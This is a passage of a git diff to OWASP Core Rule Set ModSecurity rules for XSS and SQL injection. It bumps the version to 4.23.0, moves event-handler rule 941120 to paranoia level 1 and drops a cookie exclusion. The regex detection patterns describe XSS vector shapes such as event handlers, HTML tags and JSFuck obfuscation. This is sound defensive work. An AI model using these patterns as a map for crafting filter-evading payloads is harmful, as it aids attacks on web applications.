REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Cookie|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,50}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \ + "id:941120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 2: Event Handler Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'xss-perf-disable',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-XSS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -155,7 +193,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -185,7 +223,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -219,7 +257,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -245,7 +283,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -273,7 +311,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -301,7 +339,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -324,7 +362,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -349,7 +387,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -372,7 +410,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -395,7 +433,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -418,7 +456,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -441,7 +479,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -464,7 +502,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -487,7 +525,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -510,7 +548,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -533,7 +571,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -556,7 +594,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -617,7 +655,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:\xbc\s*/\s*[^\xbe>]*[\xbe>])|(?:<\s*/\s*[^\xbe]*\xbe)" \ @@ -647,7 +685,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -678,7 +716,6 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X "id:941360,\ phase:2,\ block,\ - capture,\ t:none,\ msg:'JSFuck / Hieroglyphy obfuscation detected',\ logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ @@ -690,7 +727,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -707,7 +744,6 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx "id:941370,\ phase:2,\ block,\ - capture,\ t:none,t:urlDecodeUni,t:compressWhitespace,\ msg:'JavaScript global variable found',\ logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ @@ -719,7 +755,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -753,7 +789,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -784,14 +820,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -816,42 +852,7 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ - severity:'CRITICAL',\ - setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" - - -# -# -=[ XSS Filters - Category 2 ]=- -# XSS vectors making use of event handlers like onerror, onload etc, e.g., -# -# We are not listing all the known event handlers like rule 941160, but we -# limit the alerts to keywords of 3-50 characters after the prefix ("on"). -# -# The shortest known event is "onget". The longest known event is "onwebkitplaybacktargetavailabilitychanged" -# with 39 chars after the prefix. 50 chars adds a little bit of safety. -# -# This rule has been moved to PL2 since it has a tendency to trigger on random input. -# -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\s\"'`;/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]{3,50}[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=[^=]" \ - "id:941120,\ - phase:2,\ - block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ - msg:'XSS Filter - Category 2: Event Handler Vector',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ - tag:'application-multi',\ - tag:'language-multi',\ - tag:'platform-multi',\ - tag:'attack-xss',\ - tag:'xss-perf-disable',\ - tag:'paranoia-level/2',\ - tag:'OWASP_CRS',\ - tag:'OWASP_CRS/ATTACK-XSS',\ - tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -878,7 +879,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -907,7 +908,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -978,7 +979,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx <(?:a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx <(?:a|abbr|acronym|address|applet|area|audioscope|b|base|basefront|bdo|bgsound|big|blackface|blink|blockquote|body|bq|br|button|caption|center|cite|code|col|colgroup|comment|dd|del|dfn|dir|div|dl|dt|em|embed|fieldset|fn|font|form|frame|frameset|h1|head|hr|html|i|iframe|ilayer|img|input|ins|isindex|kdb|keygen|label|layer|legend|li|limittext|link|listing|map|marquee|menu|meta|multicol|nobr|noembed|noframes|noscript|nosmartquotes|object|ol|optgroup|option|p|param|plaintext|pre|q|rt|ruby|s|samp|script|select|server|shadow|sidebar|small|spacer|span|strike|strong|style|sub|sup|table|tbody|td|textarea|tfoot|th|thead|title|tr|tt|u|ul|var|wbr|xml|xmp)\W" \ "id:941320,\ phase:2,\ block,\ @@ -995,12 +996,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:[\"'][ ]*(?:[^a-z0-9~_:' ]|in).*?(?:(?:l|\x5cu006C)(?:o|\x5cu006F)(?:c|\x5cu0063)(?:a|\x5cu0061)(?:t|\x5cu0074)(?:i|\x5cu0069)(?:o|\x5cu006F)(?:n|\x5cu006E)|(?:n|\x5cu006E)(?:a|\x5cu0061)(?:m|\x5cu006D)(?:e|\x5cu0065)|(?:o|\x5cu006F)(?:n|\x5cu006E)(?:e|\x5cu0065)(?:r|\x5cu0072)(?:r|\x5cu0072)(?:o|\x5cu006F)(?:r|\x5cu0072)|(?:v|\x5cu0076)(?:a|\x5cu0061)(?:l|\x5cu006C)(?:u|\x5cu0075)(?:e|\x5cu0065)(?:O|\x5cu004F)(?:f|\x5cu0066)).*?=)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:[\"'][ ]*(?:[^a-z0-9~_:' ]|in).*?(?:(?:l|\x5cu006C)(?:o|\x5cu006F)(?:c|\x5cu0063)(?:a|\x5cu0061)(?:t|\x5cu0074)(?:i|\x5cu0069)(?:o|\x5cu006F)(?:n|\x5cu006E)|(?:n|\x5cu006E)(?:a|\x5cu0061)(?:m|\x5cu006D)(?:e|\x5cu0065)|(?:o|\x5cu006F)(?:n|\x5cu006E)(?:e|\x5cu0065)(?:r|\x5cu0072)(?:r|\x5cu0072)(?:o|\x5cu006F)(?:r|\x5cu0072)|(?:v|\x5cu0076)(?:a|\x5cu0061)(?:l|\x5cu006C)(?:u|\x5cu0075)(?:e|\x5cu0065)(?:O|\x5cu004F)(?:f|\x5cu0066)).*?=)" \ "id:941330,\ phase:2,\ block,\ @@ -1017,7 +1018,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1025,7 +1026,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\"\'][ ]*(?:[^a-z0-9~_:\' ]|in).+?[.].+?=" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)[\"\'][ ]*(?:[^a-z0-9~_:\' ]|in).+?[.].+?=" \ "id:941340,\ phase:2,\ block,\ @@ -1042,7 +1043,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NA tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1064,7 +1065,6 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X "id:941380,\ phase:2,\ block,\ - capture,\ t:none,\ msg:'AngularJS client side template injection detected',\ logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ @@ -1076,23 +1076,23 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-XSS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf index 3c14d4c63f..27e76ed960 100644 --- a/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf +++ b/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -59,7 +59,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-SQLI',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ @@ -90,7 +90,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* 